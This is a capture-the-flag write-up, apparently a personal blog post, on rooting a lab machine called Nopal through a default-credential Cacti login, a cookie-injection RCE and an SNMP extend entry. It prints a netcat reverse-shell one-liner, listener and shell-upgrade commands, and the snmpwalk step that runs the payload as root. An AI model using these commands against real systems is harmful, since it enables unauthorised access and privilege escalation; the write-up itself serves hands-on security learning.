Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v

# Nmap 7.91 scan initiated Fri Dec  3 09:28:53 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v
Warning: giving up on port because retransmission cap hit (10).
Increasing send delay for from 320 to 640 due to 229 out of 762 dropped probes since last increase.
Increasing send delay for from 640 to 1000 due to 136 out of 451 dropped probes since last increase.
Nmap scan report for
Host is up (0.14s latency).
Not shown: 37499 filtered ports, 28035 closed ports
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Dec  3 09:30:16 2021 -- 1 IP address (1 host up) scanned in 82.67 seconds

Now let use nmap default script and service detection to get more information from the target.

nmap -sC -sV -oA nmap/normal -p 80

└─$ nmap -sC -sV -oA nmap/normal -p 80            
Starting Nmap 7.91 ( ) at 2021-12-03 09:58 WAT
Nmap scan report for
Host is up (0.42s latency).

80/tcp open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds

Man am so excited over pwning Nopal man it was awesome i learn something new which is awesome so much awesome so without wasting to much of our time let just jump in since we have only HTTP port let hit it.


Now we have a login page wich is in need of a credentials and we have the version also before jumping in first what is cacti.


Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

Now time to hit some research finding some default credentials luckily i came accross guest/guest and boom we are in.


Now since we know the version let try find some exploit if it vulnerable. Found some interesting but it was in metasploit module so i try doing it manaully.


Boom yes it a Remote Code Execution exploit so let run it manaully.

Cacti v1.2.8 Remote Code Execution Manually


Navigating to so let intercept it using burp suite and send to repeater.


Right click and send to repeater.


The vulnerable part is the Cookie session so we will be injecting our payload to the cookie.


If we want to use netcat to gain a shell, we need to create the following payload:


I got an idea to use ${IFS} bash variable which represent a space. And of course we need to escape the command using ; to be like the above one.

Lets try it and see the results by encoding the payload first:



Now let start our Ncat listener before running the payload.


Now we are ready let inject our payload and send.


Now send let check our Ncat listener.


Boom we have shell let spawn a tty shell to make our shell more stable.

└─$ nc -nvlp 1337                                 
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 43204
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn ("/bin/bash")'
www-data@nopal:/opt/cacti$ ^Z
zsh: suspended  nc -nvlp 1337
└─$ stty raw -echo;fg                                                                                                                                        148 ⨯ 1 ⚙
[1]  + continued  nc -nvlp 1337

www-data@nopal:/opt/cacti$ stty rows 17 cols 190
www-data@nopal:/opt/cacti$ export TERM=xterm


We have one flag /etc/passwd four more to go let check what ports we have running locally.

www-data@nopal:/opt/cacti$ ss -tulpn
Netid  State      Recv-Q Send-Q                                               Local Address:Port                                                              Peer Address:Port              
udp    UNCONN     0      0                                                                                                                     *:*                  
udp    UNCONN     0      0                                                                                                                        *:*                  
tcp    LISTEN     0      80                                                                                                                      *:*                  
tcp    LISTEN     0      128                                                              *:80                                                                           *:*                   users:(("nginx",pid=420,fd=6))
tcp    LISTEN     0      128                                                                                                                   *:*                  

Seems we have SNMP port running let check for conf file.


cat /etc/snmp/snmpd.conf we have another flag which is cool but about the conf file something stand out extend etsctf /tmp/ seems like to possible for us to get RCE with SNMP. So let do some research on it.


SNMP is sometimes overseen by the administrator of the device or server where it is left in a default configuration. SNMP community with write permissions (rwcommunity) on the Linux operating system can be abused to let the attacker execute a command on the server.


Source hacktricks

Extending The Services

While you are not able to modify existing entries that were configured in snmpd.conf, it is possible to add additional commands over SNMP, because the MAX-ACCESS permission setting in the MIB definition is set to read-create

Adding a new command basically works by appending an additional row to the nsExtendObjects table. Feel free tp read more here Snmp Arbitary Command Execution And Shell Now let jump back to exploit our target.

We need to change directory to /tmp to create the file that will hold our reverse shell payload;

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

Save in and make it executable with chmod +x and we should start our Ncat listener also before walking with SNMP.


Now is the time to walk let run;

snmpwalk -c public -v1 . -On


Boom we have root shell and we have walk successfully which also execute the bash file with root privilege to give us root shell.


We spawn a tty sheel to make it more stable now let get the flags.


/etc/shadow Flag


/root Flag. Now to get the last flag is env let check our process.

ps -aux


Interesting let get it.


Boom and we are done.

Greeting From Muzec

Back To Home